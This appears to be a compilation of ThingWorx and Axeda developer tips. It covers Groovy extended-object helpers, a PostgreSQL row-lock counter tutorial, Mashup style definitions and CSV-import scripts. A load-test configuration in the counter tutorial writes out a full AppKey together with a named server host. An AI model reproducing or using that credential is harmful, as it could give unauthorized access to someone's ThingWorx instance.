    criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"
    criteria.internalObjectId = dataItem.id.value
    if (searchcriteria != null) {
        criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)
    }
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    return queryResult
}

def fetchExtendedObject(User user, Map searchcriteria) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.extendedObjectClassName = "com.axeda.drm.sdk.user.User"
    criteria.extendedClientKey = "ExtendedObject!${user.username}"
    criteria.internalObjectId = user.id.value
    criteria.propertySearchCriteria = exactdatePropertySearch(searchcriteria)
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    return queryResult
}

def addExtendedObject(String eoTypeName, Long referenceId, String referenceName, Map objectProperties) {
    def eo = new ExtendedObject()
    eo.internalObjectId = referenceId
    eo.extendedObjectType = eoSvc.findExtendedObjectTypeByClassname(eoTypeName)
    eo.externalClientKey = referenceName
    eo = eoSvc.createExtendedObject(eo)
    eo = createProperties(eoSvc, eo, objectProperties)
    return eo
}

// NOTE: the original listing collapsed both parameter names and several local
// variable names into "ExtendedObject"; the names used here are reconstructions.
// stateObject holds the accumulated lasttype/lasttime/*_total properties, while
// eventObject carries the new type/timestamp values.
def updateExtendedObject(ExtendedObject stateObject, ExtendedObject eventObject) {
    def stateProps = getProperties(stateObject)
    def eventProps = getProperties(eventObject)
    def newproperties = [:]
    if (eventProps.timestamp != null) {
        def lastType = stateProps.lasttype
        def lastTime = stateProps.lasttime
        if (lastType == null) {
            newproperties["lasttype"] = eventProps.type
            newproperties["lasttime"] = eventProps.timestamp
        } else {
            def oldtime = Long.valueOf(lastTime)
            def total = (Long.valueOf(eventProps.timestamp) - oldtime) / 1000
            // illustrating getPropertyByName
            def lasttype = stateObject.getPropertyByName("lasttype")
            lasttype.setValue(eventProps.type)
            def lasttime = stateObject.getPropertyByName("lasttime")
            lasttime.setValue(eventProps.timestamp)
            updateProperty(lasttype)
            updateProperty(lasttime)
            if (stateProps.containsKey(lastType + "_total") == false) {
                newproperties[lastType + "_total"] = total
            } else {
                def totalprop = stateObject.getPropertyByName(lastType + "_total")
                def lasttotal = Double.valueOf(totalprop.value)
                totalprop.setValue(String.valueOf(Double.valueOf(total) + lasttotal))
                updateProperty(totalprop)
            }
        }
        if (newproperties.size() > 0) {
            stateObject = createProperties(eoSvc, stateObject, newproperties)
        }
    }
    return stateObject
}

def getProperties(ExtendedObject object) {
    def result = object.properties.inject([:]) { target, property ->
        target += [(property.propertyType.name): castPropertyValueToDefinedType(property)]
    }
    return result
}

def formatProperties(Map properties) {
    def result = properties.collect { property, value ->
        [type: property, time: value]
    }
    return result
}

def updateProperty(Property property) {
    eoSvc.updateProperty(property)
    return property
}

//default string version
def createProperties(ExtendedObjectService eoSvc, ExtendedObject object, Map properties) {
    return createProperties(eoSvc, object, properties, PropertyDataType.String)
}

//WARNING: PDT may not work if it's a Date; it hasn't been tested.
def createProperties(ExtendedObjectService eoSvc, ExtendedObject object, Map properties, PropertyDataType PDT) {
    // http://groovy.codehaus.org/Operators#Operators-ElvisOperator
    PDT = PDT ?: PropertyDataType.String
    properties.each { k, v ->
        def property = new com.axeda.platform.sdk.v1.services.extobject.Property()
        def propertytype = object.extendedObjectType.getPropertyTypeByName(k.toString())
        if (propertytype == null) {
            def newPropertyType = new PropertyType()
            newPropertyType.name = k
            newPropertyType.dataType = PDT
            newPropertyType.extendedObjectType = object.extendedObjectType
            eoSvc.createPropertyType(newPropertyType)
            property.propertyType = newPropertyType
        } else {
            property.propertyType = propertytype
        }
        property.value = (PDT == PropertyDataType.Date && v instanceof Date ? v.format("yyyy-MM-ddTHH:mm:ssZ") : v.toString())
        eoSvc.createPropertyOnExtendedObject(object, property)
    }
    object = findExtendedObjectById(object.id)
    return object
}

def findExtendedObjectById(Long id) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.id = id
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    return queryResult.first()
}

def findObjectByNextPropertyValue(ExtendedObject object, Map criteria, PropertySearchCriteria psCriteria) {
    Property prop = object.getPropertyByName(criteria.incrementName)
    def incrementedProp = prop.value.toInteger() + criteria.incrementValue.toInteger()
    psCriteria.setPropertyExpression(
        PropertyExpressionFactory.and(
            psCriteria.propertyExpression,
            PropertyExpressionFactory.eq(criteria.incrementName, incrementedProp.toString())
        )
    )
    def eoCriteria = new ExtendedObjectSearchCriteria()
    eoCriteria.extendedObjectClassName = "com.axeda.drm.sdk.user.User"
    eoCriteria.internalObjectId = object.internalObjectId
    eoCriteria.propertySearchCriteria = psCriteria
    def queryResult = eoSvc.findExtendedObjects(eoCriteria, -1, -1, null)
    return queryResult.first()
}

def advancedPropertySearch(Map searchcriteria) {
    def propCriteria = new PropertySearchCriteria()
    propCriteria.setPropertyExpression(
        PropertyExpressionFactory.and(
            PropertyExpressionFactory.eq("year", searchcriteria.year),
            PropertyExpressionFactory.and(
                PropertyExpressionFactory.eq("month", searchcriteria.month),
                PropertyExpressionFactory.eq("date", searchcriteria.date)
            )
        )
    )
    return propCriteria
}

static def extendedObjectToMap(ExtendedObject object) {
    Map result = [:]
    result.extendedObjectType = object?.extendedObjectType?.className
    result.extendedObjectTypeId = object?.extendedObjectTypeId
    result.id = object?.id
    result.externalClientKey = object?.externalClientKey
    result.internalObjectId = object?.internalObjectId
    // build up the properties of the ExtendedObject
    result.properties = object?.properties.inject([:]) { target, property ->
        target += [(property?.propertyType?.name): castPropertyValueToDefinedType(property)]
    }
    return result
}

static def extendedObjectTypeToMap(ExtendedObjectType objectType) {
    Map result = [:]
    result.className = objectType.className
    result.id = objectType.id
    result.displayName = objectType.displayName
    result.userDefined = objectType.userDefined
    result.description = objectType.description
    result.properties = objectType.propertyTypes.inject([]) { List list, PropertyType propertyType ->
        list << [
            name: propertyType.name,
            id: propertyType.id,
            description: propertyType.description,
            dataType: propertyType.dataType.toString(),
            extendedObjectType: propertyType.extendedObjectType.className
        ]
    }
    return result
}

private static def castPropertyValueToDefinedType(Property property) {
    switch (property.propertyType.dataType) {
        case PropertyDataType.Boolean:
            return property.value as Boolean
        case PropertyDataType.Date:
            Calendar calendar = javax.xml.bind.DatatypeConverter.parseDateTime(property.value)
            return calendar.getTime()
        case PropertyDataType.Double:
            return property.value as Double
        case PropertyDataType.Integer:
            return property.value as Long
        case PropertyDataType.String:
        default:
            return property.value
    }
}

static def removeExtendedObject(Long itemId) {
    def eoSvc = new ServiceFactory().getExtendedObjectService()
    eoSvc.deleteExtendedObject(itemId)
}

def removeUserExtendedObjects(User user) {
    def queryresult = fetchUserExtendedObjects(user)
    queryresult.each {
        eoSvc.deleteExtendedObject(it.id)
    }
}

ExtendedObjectType findExtendedObjectType(String typeName) {
    ExtendedObjectType userObjType = eoSvc.findExtendedObjectTypeByClassname(typeName)
    return userObjType
}

ExtendedObjectType findOrCreateExtendedObjectType(String typeName) {
    ExtendedObjectType type = findExtendedObjectType(typeName)
    if (type == null) {
        type = new ExtendedObjectType()
        type.className = typeName
        type.displayName = typeName
        type.description = "Autocreated type for $typeName"
        type = eoSvc.createExtendedObjectType(type)
    }
    return type
}
Thread Safe Coding, Part 2: The Database Locker Approach and Comparison
Written by Desheng Xu and edited by @vtielebein

Overview
This is the second post on this topic, describing an alternate approach to thread safe coding than the one requiring the Java extension. The demo use case here is the same as in the previous post, and there is a section at the end comparing the two approaches.

Database Locker for Thread Safe Coding
The database locker is an advanced topic, so some experience with the database thing is assumed. The following steps demonstrate how to be thread safe with a database thing.

Create a New Database Instance and a New Table for the Counter
It is strongly recommended that a new database instance be created outside of the ThingWorx database schema. This guide will NOT include instructions to create the new database instance. Use the following SQL commands to create a new table:

DROP TABLE IF EXISTS counters;
CREATE TABLE counters (
    name VARCHAR(100) UNIQUE,
    value INTEGER NULL,
    PRIMARY KEY(name)
);
INSERT INTO counters VALUES ('DemoCounter', 0);

This creates a new table called counters, initializing the first counter, called DemoCounter, with the value 0.

Create a Function to Increase and Return the New Counter Value
Use the following sample code to create a table lock function:

CREATE OR REPLACE FUNCTION IncreaseCounter(counter_name VARCHAR(100), OUT newvalue INTEGER) AS $$
BEGIN
    LOCK TABLE counters IN ACCESS EXCLUSIVE MODE;
    SELECT (SELECT value FROM counters WHERE name = $1) + 1 INTO newvalue;
    UPDATE counters SET value = newvalue WHERE name = $1;
END;
$$ LANGUAGE plpgsql;

Or use the following SQL command to create a row-level locker function instead:

CREATE OR REPLACE FUNCTION IncreaseCounter(counter_name VARCHAR(100), OUT newvalue INTEGER) AS $$
BEGIN
    SELECT value INTO newvalue FROM counters WHERE name = $1 FOR UPDATE;
    newvalue := newvalue + 1;
    UPDATE counters SET value = newvalue WHERE name = $1;
END;
$$ LANGUAGE plpgsql;

Create a Database Thing
Create a thing with the template "database" within ThingWorx, and use the PostgreSQL driver to connect to the new database instance created above.

Create New Services in the Database Thing
The service IncreaseCounterDB is a SQL Query service:

SELECT * FROM public.IncreaseCounter([[counter_name]]);

counter_name is an input parameter, a STRING marked as required.

The service GetCounterDB is another SQL Query service:

SELECT value FROM public.counters WHERE name = [[counter_name]] LIMIT 1;

counter_name is again a required STRING input parameter.

The service ResetCounterDB is a SQL Command service:

UPDATE public.counters SET value = 0 WHERE name = [[counter_name]];

counter_name is again a required STRING input parameter.

Wrap the Database Thing Services
The database thing services above return an InfoTable rather than an integer. If it's inconvenient to use an InfoTable, wrap each service in a local JavaScript service that returns an integer value. The service IncreaseCounter wraps IncreaseCounterDB and returns an integer:

// result: INFOTABLE dataShape: ""
var query_result = me.IncreaseCounterDB({
    counter_name: 'DemoCounter' /* STRING */
});
var result = query_result.rows[0]["newvalue"];

Similarly, GetCounter wraps GetCounterDB:

// result: INFOTABLE dataShape: "SingleIntegerDatashape"
var query_result = me.GetCounterDB({
    counter_name: 'DemoCounter' /* STRING */
});
var result = query_result.rows[0]["value"];

And ResetCounter wraps ResetCounterDB:

// result: NUMBER
var query_result = me.ResetCounterDB({
    counter_name: 'DemoCounter' /* STRING */
});
var result = 0;

Run the Test Again
If necessary, head back to the previous post to obtain the test tool. Then just change the endpoint and run a new test:

{
    "host": "twx85.desheng.io",
    "port": 443,
    "protocol": "https",
    "endpoint": "/Thingworx/Things/DatabaseDemo/services/IncreaseCounter",
    "headers": {
        "Content-Type": "application/json",
        "Accept": "application/json",
        "AppKey": "5cafe6eb-adba-41df-a7d6-4fc8088125c1"
    },
    "payload": {},
    "round_break": 50000,
    "req_break": 0,
    "round_size": 50,
    "total_round": 20
}

Validate the Result
Execute the service GetCounter to validate the result.

Overall Performance Comparison
The Java extension performs best here, but the database row lock will perform better when there are multiple counters.

InfoTable Type Properties
InfoTable properties have the same thread-safety challenges discussed previously, but they also have some additional challenges due to the way data change events are triggered. This is outside the scope of this document, but it is worth a very brief mention here.

In general, the data change event for an InfoTable fires when the reference to the table is updated, not when the contents of the table change. If the values of an InfoTable are updated directly, say by adding or removing a row, the data change event will not be triggered, because the value has technically not changed. Instead, the InfoTable has to be cloned, then modified, and then assigned back to the Thing so that the reference changes as well. Such additional considerations must be made when using property types other than those shown here.
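A minimal sketch of that clone-then-assign pattern (the property and field names are hypothetical):

// Mutating me.Readings in place would NOT fire DataChange: the reference is unchanged.
// Clone the table, modify the copy, then assign it back so the reference itself changes.
var updated = me.Readings.Clone();
updated.AddRow({ sensor: "s1", value: 42 });
me.Readings = updated; // the reference change is what triggers the DataChange event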
Convey information about IoT data effectively by customizing style definitions and implementing event-based logic.

Guide Concept

This project will help you identify how you would like to create an experience for users.

Following the steps in this guide, you will use color schemes to convey information quickly and effectively, for example to alert users of critical events. With ThingWorx Composer, you can implement Styles and States in your Mashups to enhance your user experience.

We will teach you how to create an effective IoT application experience that looks great and is easy to navigate. How the UI is presented can influence users and their enjoyment of the application.

You'll learn how to:
- Create a Style Definition
- Customize Style Definitions
- Create and implement State Definitions
- Implement event-based state changes

NOTE: This guide's content aligns with ThingWorx 9.3. The estimated time to complete this guide is 60 minutes.

Step 1: Completed Example

Download the StylesAndStates.xml attached to this guide. Within this file, you will find the Entities referenced in this lesson, including a finished application. Import and utilize this file to see a finished example, and return to it as a reference if you become stuck during this guide and need some extra help or clarification.

Keep in mind, this download uses the exact names for entities used in this tutorial. If you would like to import this example and also create entities on your own, change the names of the entities you create.

Step 2: Create Style Definition

A Style Definition is a collection of HTML styling elements that can be applied to a Widget, just as you would apply a CSS definition to an HTML tag. With Style Definitions, you can control the look and feel of individual Widgets in your Mashup, such as colors, fonts, and color context.

1. In the ThingWorx Composer, click + New at the top of the screen.
2. Select Style Definition in the dropdown.
3. Enter a name for the Style Definition, such as StyleDefinition.
4. Set the Project to an existing Project (i.e., PTCDefaultProject).
5. Click Style Information. The Style Information page shows the options for images, colors, lines, and display text. See the table below for information on what each field controls.
6. Type PlaygroundBackground in the Display String field.

NOTE: If you go back to the HelloWorldPlayground, clear the Mashup Style property, then search for StyleDefinition again, you will see the PlaygroundBackground descriptive text.

7. Select Background Color. A color palette will appear. Select White and click Select.
8. Select Text Color. A color palette will appear. Select Black and click Select.
9. Click Save.

You have now created your first Style Definition. To ensure a consistent user experience, we recommend creating a Style Definition that you can use throughout your application.
Option: Description
Display String: Descriptive string that can be displayed to indicate the currently applied style definition
Background Color: Background for charts, buttons, panels, etc.
Secondary Background Color: Meant for Widgets that support gradients
Foreground Color: Used for foreground characteristics such as button text and label text
Font Bold: For text, whether the text should be bold
Font Italic: For text, whether the text should be italicized
Font Underline: For text, whether the text should be underlined
Image: Add images
Line Color: Pen styling in charts
Line Thickness: Pen styling in charts
Line Style: Generally refers to borders. ThingWorx provides the following options: Solid, Dashed, Dotted, None
Text Size: Choose a font size from 9-72px

In the next part of this exercise, you'll learn how to use Style Definitions to create an engaging experience for your application users.

Step 3: Customize Style Definitions

Open the HelloWorldPlayground Mashup in Composer, and click View Mashup. It shows a Button that sends an Event to a Gauge Widget, which then updates a Line Chart.

Modify Style Definition

In this part of the lesson, we'll make some changes to this Mashup. We will use Style Definitions to change the background of the Mashup, change the colors used in the Line Chart to make information stand out, and add color to the Gauge Widget.

1. In the Explorer tab, select the Mashup.
2. Select the Style Properties tab, then click the X button to clear the Style Mashup Properties.

When editing a Mashup, you can either use a Style Definition Thing that you created earlier OR you can click the wand in a style property for a Mashup or Widget, followed by clicking the + Custom button, to create a one-time-use style.

3. With the Style Property clear, enter the Style Definition you created in the last section. Update the Background Color to #FF9082 to make the color pop in the Mashup.
4. Click Save and View Mashup to see the changes.

You have now updated the background for the HelloWorldPlayground. The style properties you define in the Style Definition will be consistent for any Mashup that references this Style Definition. Change the style around, or create a custom style, and see the changes in the Mashup. Below is what we'll be working to create; use it to get ideas for what you might want to change in your own styling.

Customize Widget Style

ThingWorx provides a default Style Definition for many of its Widgets. Before editing the Style Definitions of a Widget, click the Style Definition property, then click View. This enables you to see what the current values are and what you might want to change. If the changes are slight, create a copy of the original Style Definition and update the new version.

Until you are sure of the color schemes you would like to implement, use the default Style Definitions as a guide when creating your own versions.

Default Style Definitions

Next, we will update the colors and style of the Line Chart.

1. Open the HelloWorldPlayground and select the Line Chart in the Workspace pane.
2. Click the Style Properties tab to see the chart styles section.
3. Update the Legend->Color property to Blue.

Customize Chart Style Theme

In this part of the lesson, we will update the Series1 and StyleTheme properties of the Line Chart. This is also how you'll set the colors for the chart titles.

The Series1 property will update the look and feel of the line for the count value being used.
Because the Line Chart is a line graph, the only property you need to change is the Line Color property.

The StyleTheme property will update the background look of the Line Chart grid.

1. Clear the StyleTheme and click the + button to create a new theme. Create a theme with the name CustomTheme.
2. Click the Style tab and edit the feel of the items as you see fit.
3. After opening the Style Theme for editing, click Colors. Here you'll see all the options and fields you can use to build your own color scheme, as conservative or as adventurous as you like.
4. Click Text Colors, then click the Grids and Lists tab on the right. This is where we will shape the colors for the chart. When you're done with this, update the Core Colors section to make your Mashup pop even more.

You may also notice a more focused method of updating grids and lists: the Elements section below offers a more targeted way to update them.

NOTE: As an extension, after completing the previous steps, try to use Style Definitions to customize the sections of the UI on your own.

Click here to view Part 2 of this guide.
View full tip
These code snippets illustrate parsing CSV files and populating the Axeda Enterprise with data, locations, and organizations. These files are incoming to the Axeda Platform.

Note: These snippets do NOT handle null values in the CSV due to the lack of a CSV parsing library. The workaround is to populate empty values with an empty or null signifier (such as a blank space) and test for these on the Groovy side.

Code Snippets:
CSV file to Data Items
CSV file to Location Organization

Script Name: CSV file to Data Items
Description: Executed from an expression rule with file hint "datainsert", takes a CSV file and adds data based on its values.
Parameters: OPTIONAL - only needed for debugging
modelName - (OPTIONAL) Str - name of the model
serialNumber - (OPTIONAL) Str - the serial number

import com.axeda.drm.sdk.Context
import com.axeda.drm.sdk.device.DeviceFinder
import com.axeda.drm.sdk.device.ModelFinder
import com.axeda.drm.sdk.device.DataItemFinder
import com.axeda.drm.sdk.device.DataItem
import com.axeda.drm.sdk.data.DataValueEntry
import java.util.regex.Pattern
import groovy.json.*
import com.axeda.drm.services.device.DataItemType
import net.sf.json.JSONObject

/**
 * CSVToData.groovy
 * -----------------------
 *
 * Executed from an expression rule with file hint "datainsert", takes a CSV file and adds data based on values.
 *
 * @note There must be a column with "model" and one with "serial". The rest of the columns should be data item
 * names with values in the rows. DOES NOT handle null values in CSV. Workaround is to insert blank spaces in
 * null values and test for those on the Groovy side. Solution would be to add a library for CSV parsing such as OpenCSV.
 *
 * @params - only needed if NOT executed from expression rule - primarily for debugging
 * modelName - (OPTIONAL) Str - name of the model
 * serialNumber - (OPTIONAL) Str - the serial number
 */

/**
 * initialize our global variables
 * json = the contents of our response
 * infoString = a StringBuilder used to collect debug information during the script
 * contentType = the content type we will return
 * scriptName = the name of this script, used in multiple places
 */
def json = new groovy.json.JsonBuilder()
def infoString = new StringBuilder()
def contentType = "application/json"
def scriptName = "CSVToData.groovy"
def root = ["result": ["items": []]]
def columns = []

try {
  Context CONTEXT = Context.getSDKContext()
  def modelIndex
  def serialIndex

  // initialize Model and Device Finders
  ModelFinder modelFinder = new ModelFinder(CONTEXT)
  DeviceFinder deviceFinder = new DeviceFinder(CONTEXT)

  // implicit object compressedFile
  File file = compressedFile.getFiles()[0].extractFile()

  /* //begin non-expression rule code, useful for debugging
  File file
  modelFinder.setName(Request.parameters.modelname)
  def model1 = modelFinder.find()
  deviceFinder.setSerialNumber(Request.parameters.serialNumber)
  deviceFinder.setModel(model1)
  def d = deviceFinder.find()
  UploadedFileFinder uff = new UploadedFileFinder(CONTEXT)
  uff.device = d
  def ufiles = uff.findAll()
  UploadedFile ufile
  if (ufiles.size() > 0) {
      ufile = ufiles[0]
      file = ufile.extractFile()
  }
  */ //end non-expression rule code

  file.eachLine { line ->
    def row = line.tokenize(',')

    // set the column headings
    if (columns.size() == 0) {
      columns = row

      // find model and serial index; assumes there's a column with "model" and one with "serial", otherwise take columns 0 and 1
      def modelpatt = Pattern.compile(/[A-Za-z_\-]{0,}model[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)
      def serialpatt = Pattern.compile(/[A-Za-z_\-]{0,}serial[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)
      modelIndex = columns.findIndexOf { it ==~ modelpatt } > -1 ? columns.findIndexOf { it ==~ modelpatt } : 0
      serialIndex = columns.findIndexOf { it ==~ serialpatt } > -1 ? columns.findIndexOf { it ==~ serialpatt } : 1
    }
    // otherwise populate data
    else {
      modelFinder.setName(row.get(modelIndex))
      def model = modelFinder.find()

      deviceFinder.setModel(model)
      deviceFinder.setSerialNumber(row.get(serialIndex))
      def device = deviceFinder.find()

      def assetInfo = [
        "model" : model.name,
        "serial": device.serialNumber,
        "data"  : []
      ]

      row.eachWithIndex { item, index ->
        if (index != modelIndex && index != serialIndex) {
          def dataItemName = columns[index].replace(" ", "")
          DataItemFinder dif = new DataItemFinder(CONTEXT)
          dif.setDataItemName(dataItemName)
          dif.setModel(model)
          DataItem dataItem = dif.find()

          if (dataItem) {
            if (item.isNumber()) {
              item = Double.valueOf(item)
            }
            DataValueEntry dve = new DataValueEntry(CONTEXT, device, dataItem, item)
            dve.store()
          }
          else {
            // the data item doesn't exist yet; create it with a type inferred from the value
            DataItem newDataItem
            if (item.isNumber()) {
              newDataItem = new DataItem(CONTEXT, model, DataItemType.ANALOG, dataItemName)
              item = Double.valueOf(item)
            }
            else {
              newDataItem = new DataItem(CONTEXT, model, DataItemType.STRING, dataItemName)
            }
            newDataItem.store()
            DataValueEntry dve = new DataValueEntry(CONTEXT, device, newDataItem, item)
            dve.store()
          }

          assetInfo.data << [
            "name" : dataItemName,
            "value": item
          ]
        }
      }

      // record this asset's data once per CSV row
      root.result.items << assetInfo
    }
  }
  logger.info(JSONObject.fromObject(root).toString(2))
}
catch (Exception e) {
  processException(scriptName, json, e)
}
//return ['Content-Type': 'application/json', 'Content': JSONObject.fromObject(root).toString(2)]

/*
    Processes the contents of an Exception and adds it to the Errors collection
    @param json The markup builder
*/
private def processException(String scriptName, JsonBuilder json, Exception e) {
  // catch the exception output
  def logStringWriter = new StringWriter()
  e.printStackTrace(new PrintWriter(logStringWriter))
  logger.error("Exception occurred in ${scriptName}: ${logStringWriter.toString()}")
  /*
      Construct the error response
      - errorCode Will be an element from an agreed upon enum
      - errorMessage The text of the exception
  */
  json.errors {
    error {
      message   "[${scriptName}]: " + e.getMessage()
      timestamp "${System.currentTimeMillis()}"
    }
  }
  return json
}

Script Name: CSV file to Location Organization
Description: Executed from an expression rule with file hint "locorginsert", takes a CSV file and adds orgs and locations based on its values.
Parameters: OPTIONAL - only needed for debugging
modelName - (OPTIONAL) Str - name of the model
serialNumber - (OPTIONAL) Str - the serial number

import com.axeda.drm.sdk.Context
import com.axeda.drm.sdk.device.DeviceFinder
import com.axeda.drm.sdk.device.ModelFinder
import com.axeda.drm.sdk.device.DataItemFinder
import com.axeda.drm.sdk.device.DataItem
import com.axeda.drm.sdk.data.DataValueEntry
import java.util.regex.Pattern
import groovy.json.*
import com.axeda.drm.services.device.DataItemType
import net.sf.json.JSONObject
import com.axeda.drm.sdk.contact.Organization
import com.axeda.drm.sdk.contact.Location
import com.axeda.drm.sdk.contact.OrganizationFinder
import com.axeda.drm.sdk.contact.LocationFinder
import com.axeda.drm.sdk.data.UploadedFile
import com.axeda.drm.sdk.data.UploadedFileFinder

/**
 * CSVToLocOrg.groovy
 * -----------------------
 *
 * Executed from an expression rule with file hint "locorginsert", takes a CSV file and adds orgs and locations based on values.
 *
 * @note There must be a column with "model" and one with "serial". The rest of the columns should be either parts of a
 * location or an organization. The location parts columns should be prefixed with the org# that they correspond to.
 * DOES NOT handle null values in CSV. Workaround is to insert blank spaces in null values and test for those on the
 * Groovy side. Solution would be to add a library for CSV parsing such as OpenCSV.
 *
 * @params - only needed if NOT executed from expression rule - primarily for debugging
 * modelName - (OPTIONAL) Str - name of the model
 * serialNumber - (OPTIONAL) Str - the serial number
 */

/**
 * initialize our global variables
 * json = the contents of our response
 * infoString = a StringBuilder used to collect debug information during the script
 * contentType = the content type we will return
 * scriptName = the name of this script, used in multiple places
 */
def json = new groovy.json.JsonBuilder()
def infoString = new StringBuilder()
def contentType = "application/json"
def scriptName = "CSVToLocOrg.groovy"
def root = ["result": ["items": []]]
def columns = []

try {
  Context CONTEXT = Context.getSDKContext()
  def modelIndex
  def serialIndex
  def locIndices = [:]
  def locKeys = ["line1", "line2", "address1", "address2", "city", "state", "zip", "country", "org"]

  // initialize Finders
  ModelFinder modelFinder = new ModelFinder(CONTEXT)
  DeviceFinder deviceFinder = new DeviceFinder(CONTEXT)
  LocationFinder locationFinder = new LocationFinder(CONTEXT)
  OrganizationFinder organizationFinder = new OrganizationFinder(CONTEXT)

  // implicit object compressedFile
  File file = compressedFile.getFiles()[0].extractFile()

  /* //begin non-expression rule code, useful for debugging
  File file
  modelFinder.setName(Request.parameters.modelname)
  def model1 = modelFinder.find()
  deviceFinder.setSerialNumber(Request.parameters.serialNumber)
  deviceFinder.setModel(model1)
  def d = deviceFinder.find()
  UploadedFileFinder uff = new UploadedFileFinder(CONTEXT)
  uff.device = d
  def ufiles = uff.findAll()
  UploadedFile ufile
  if (ufiles.size() > 0) {
      ufile = ufiles[0]
      file = ufile.extractFile()
  }
  */ //end non-expression rule code

  file.eachLine { line ->
    def row = line.tokenize(',')

    // set the column headings
    if (columns.size() == 0) {
      columns = row

      // find model and serial index; assumes there's a column with "model" and one with "serial", otherwise take columns 0 and 1
      def modelpatt = Pattern.compile(/[A-Za-z_\-]{0,}model[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)
      def serialpatt = Pattern.compile(/[A-Za-z_\-]{0,}serial[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)
      modelIndex = columns.findIndexOf { it ==~ modelpatt } > -1 ? columns.findIndexOf { it ==~ modelpatt } : 0
      serialIndex = columns.findIndexOf { it ==~ serialpatt } > -1 ? columns.findIndexOf { it ==~ serialpatt } : 1

      locKeys.each { key ->
        // construct a regex for each key and create a map for finding/creating
        def locPatt = Pattern.compile(/[A-Za-z0-9_\-]{0,}${key}[A-Za-z0-9_\-]{0,}/, Pattern.CASE_INSENSITIVE)
        def colIndex = columns.findIndexOf {
          def match = it =~ locPatt
          if (match) {
            return match?.getAt(0)
          }
        }
        if (colIndex > -1) {
          locIndices[colIndex] = key
        }
      }
    }
    // otherwise populate data
    else {
      modelFinder.setName(row.get(modelIndex))
      def model = modelFinder.find()

      deviceFinder.setModel(model)
      deviceFinder.setSerialNumber(row.get(serialIndex))
      def device = deviceFinder.find()

      def assetInfo = [
        "model" : model.name,
        "serial": device.serialNumber,
        "locs"  : []
      ]

      def locMap = [:]
      def orgName
      def locKey
      def locBool = false // make sure we get some criteria

      row.eachWithIndex { item, index ->
        if (index != modelIndex && index != serialIndex && item && item != "") {
          locKey = locIndices[index]
          if (locKey) {
            locBool = true
            if (locKey == "address1") {
              locKey = "line1"
            }
            if (locKey == "address2") {
              locKey = "line2"
            }
            if (locKey == "org") {
              orgName = item
            }
            // don't execute if we've got an organization key
            else {
              // for finding
              locationFinder[locKey] = item
              // for creating (if needed)
              locMap[locKey] = item
            }
          }
        }
      }

      Organization org
      if (orgName) {
        organizationFinder.setName(orgName)
        org = organizationFinder.find()
        if (!org) {
          org = new Organization(CONTEXT, orgName)
          org.store()
        }
      }

      Location loc
      if (locBool) {
        logger.info("with bool")
        loc = locationFinder.find()
        logger.info(loc?.name)
      }
      if (!loc) {
        def line1 = locMap["line1"]
        def name = line1?.replace(" ", "")?.replace(/\./, "")?.replace("_", "") + "_Loc"
        def line2 = locMap["line2"]
        def city = locMap["city"]
        def state = locMap["state"]
        def zip = locMap["zip"]
        def country = locMap["country"]
        if (line1 && city) {
          loc = new Location(CONTEXT, name, line1, line2, city, state, zip, country)
          loc.store()
        }
        if (loc && org) {
          org.addLocation(loc)
          org.store()
        }
      }

      assetInfo.locs << [
        "name"   : loc.name,
        "line1"  : loc.line1,
        "line2"  : loc.line2,
        "city"   : loc.city,
        "state"  : loc.state,
        "zip"    : loc.zip,
        "country": loc.country
      ]
      assetInfo.org = [
        "name": org.name
      ]
      root.result.items << assetInfo
    }
  }
  logger.info(JSONObject.fromObject(root).toString(2))
}
catch (Exception e) {
  processException(scriptName, json, e)
}
//return ['Content-Type': 'application/json', 'Content': JSONObject.fromObject(root).toString(2)]

/*
    Processes the contents of an Exception and adds it to the Errors collection
    @param json The markup builder
*/
private def processException(String scriptName, JsonBuilder json, Exception e) {
  // catch the exception output
  def logStringWriter = new StringWriter()
  e.printStackTrace(new PrintWriter(logStringWriter))
  logger.error("Exception occurred in ${scriptName}: ${logStringWriter.toString()}")
  /*
      Construct the error response
      - errorCode Will be an element from an agreed upon enum
      - errorMessage The text of the exception
  */
  json.errors {
    error {
      message   "[${scriptName}]: " + e.getMessage()
      timestamp "${System.currentTimeMillis()}"
    }
  }
  return json
}
View full tip
Video Author:                     Christophe Morfin Original Post Date:            October 6, 2017 Applicable Releases:        ThingWorx Analytics 8.1   Description: This video covers the new features of ThingWorx Analytics Builder 8.1      
View full tip
Video Author: Asia Garrouj
Original Post Date: March 31, 2017
Applicable Releases: ThingWorx Analytics 7.4 to 8.1

Description:
This video is the first of a two-part series walking through the configuration of Analysis Event, which is applied for Real-Time Scoring. This first video demonstrates how to create a Template and Thing that allows the prediction model to score in real time.

Note: This video is intended for demo purposes. Customers who already have ThingWorx should already have their properties set up. In this case, you will need to configure the Analysis Event, which is demonstrated in the second part of this video series.
View full tip
Video Author: Asia Garrouj
Original Post Date: March 31, 2017
Applicable Releases: ThingWorx Analytics 7.4 to 8.1

Description:
This video walks you through the first steps of setting up Analytics Manager for Real-Time Scoring, and demonstrates how to share your predictive model from Analytics Builder into Analytics Manager, as well as how to test the shared model.
View full tip
Welcome to the ThingWorx Service Apps Community! The ThingWorx Service Apps are easy-to-deploy, pre-configured, role-based starter apps built on PTC's industry-leading IoT platform, ThingWorx. The Asset Advisor for Service provides the ability to remotely identify, diagnose, and resolve service issues for a proactive maintenance approach.

A. Sign up: PTC account credentials are needed to participate in the ThingWorx Community. If you have not yet registered a PTC eSupport account, start with the Basic Account Creation page.

B. Download: Import as a ThingWorx Extension (for users with a ThingWorx SCP entitlement, including PTC employees and PTC Partners): ThingWorx Service Apps can be imported as a ThingWorx extension into an existing ThingWorx Platform install (v8.1.0). To locate the download, open the PTC Software Download Page and expand the following folders:

PTC Smart Connected Applications | Release APPs | ThingWorx Service Apps Extension | Most Recent Datacode

C. Learn: Find helpful documentation in PTC Reference Documents.

